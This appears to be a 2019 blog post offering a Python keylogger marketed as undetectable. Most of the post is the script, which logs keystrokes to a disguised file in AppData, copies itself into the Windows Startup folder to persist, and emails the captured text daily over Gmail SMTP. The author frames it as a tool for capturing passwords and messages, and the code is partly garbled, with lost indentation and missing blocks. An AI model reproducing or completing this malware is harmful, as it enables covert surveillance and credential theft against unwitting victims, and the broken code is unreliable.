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  • اخر الاخبار

    السبت، 2 فبراير 2019

    Make A Clean Keylogger Not Detectable With EMAIL Sending:

    The keyloggers is one the most famous tool of hackers to monitoring your activities , texting , passwords ,  and so on so ford ,almost everything  you  do with your keyboard  :
    So we will see a example of a keylogger I made with python and why I recommend you to use it not any one else in other sites , will easily I make it based on a very wide search on the net and , with using my programming abilities , First if you look in google for a keylogger using python you will find many scripts that using a “functions” that make the keyboard slow , and writing a text which look very messy and not good , So here I added many functionalities to my  own script such a functions that works in a separate thread to don’t make your keyboard slow , and other functions to treat the text which will sent to you in your email (“this is another advantage  J”) so remove the name of the key like “key.remove” to remove the character instead you see what I’m talking about , so you can find more comments in the script and hope the you will understand them if not please ask me to explain more no problem ,Thank You.
    -You can check the script below
    setted by @housUnus
    more functionalities
    txt sended as string traited and clean
    run with system start up
    big greeting to "LET'S CHANGE OUR MONTALITY" Familly
    from pynput.keyboard import Key, Listener
    import logging
    import time
    import threading
    from threading import Thread
    import smtplib
    import datetime
    import getpass
    import os
    import shutil
    sendedToday = False
    #the path disired of your txt_keys file
    USER_NAME = getpass.getuser()
    log_dir = ("C:/Users/%s/AppData/Systeme.bin"% USER_NAME)
    #i save the content in file name Syseme.bin i test the reading function and it work fine with .bin files it's like .txt
    #to don't have a probleme with a big size in future , we assure that after sending data clean the file
    #main methode of email sender
    def run():
    global log_dir
    while True:
    t = datetime.datetime.today()
    future = datetime.datetime(t.year,t.month,t.day,21,0)
    #if t.hour ==00 and t.minute <12 or t.hour ==00 :
    if t.hour == 21:
    sendedToday = False
    if sendedToday == True:
    future += datetime.timedelta(days=1)
    #future = datetime.datetime(t.year,t.month,t.day,,0)
    print((future - t).seconds)
    f = open(log_dir, 'w')
    time.sleep((future - t).seconds)
    #the process of send the msg
    def send():
    global sendedToday
    server = smtplib.SMTP('smtp.gmail.com', 587)
    server.login("email to send from", "PASSWORD")
    server.sendmail("email to send from", "email to send to it", link())
    sendedToday = True
    except :
    sendedToday = False
    #try link each carachter in each line in one string
    def link():
    global log_dir
    try :
    f = open(log_dir, 'r+')
    buffer = f.read()
    return ""
    #save only the carachter and some special charachter
    msg = (buffer.replace("'","").replace("\n","").replace("Key.space"," ").replace("Key.caps_lock","^")
    msg = Upper(msg)
    msg = backD(msg)
    return msg
    #remove the if the key saved was delete
    def backD(msg):
    la = [x for x in msg]
    for j in range(len(la)) :
    for i in range(len(la)) :
    if la[i] =='<':
    bef = i-1
    return "".join(la)
    #make the carachter after the KeyLock as Upper its not so efficient
    def Upper(msg):
    la = [x for x in msg]
    count =1
    for j in range(len(la)) :
    for i in range(len(la)) :
    if la[i] =='^':
    bef = i-1
    la[bef] = la[bef].upper()
    return "".join(la)
    #start the run methode separatley to don't use more time and memories while sending and typing
    #copy the file to somewhere
    #basicly its enough to copy the file to start up
    #its possible to remove the originla file after the processof copying
    def save():
    global USER_NAME
    des = ("C:/Users/%s/AppData/values.txt"% USER_NAME)
    name = open(des,"r+")
    name = open(des,"w+")
    #copying the file to somewhere (in my case the startup path
    filePath = os.getcwd()+ '\\' + "keylogv2.py"
    Des_file = r'C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' % USER_NAME
    shutil.copy2(filePath, Des_file)
    #Scope for starting email sending and saveing the file
    Thread(target = run ).start()
    Thread(target = save ).start()
    # keystroke region
    logging.basicConfig(filename=(log_dir), level=logging.DEBUG, format='%(message)s')
    #main function get the key and saved in a fine
    def on_press(key):
    with Listener(on_press=on_press) as listener:

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